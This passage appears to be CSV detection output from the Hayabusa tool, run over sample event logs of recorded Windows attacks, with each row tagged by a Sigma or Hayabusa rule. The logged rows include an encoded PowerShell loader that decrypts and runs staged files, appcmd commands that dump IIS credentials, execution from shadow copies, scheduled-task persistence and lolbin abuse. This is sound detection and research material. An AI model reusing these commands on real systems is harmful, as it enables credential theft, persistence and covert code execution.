""Description: Cannot read configuration file due to insufficient permissions"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwB
kAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". 
)"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off 
/node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get 
state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 
+09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI 
Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" 
""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 
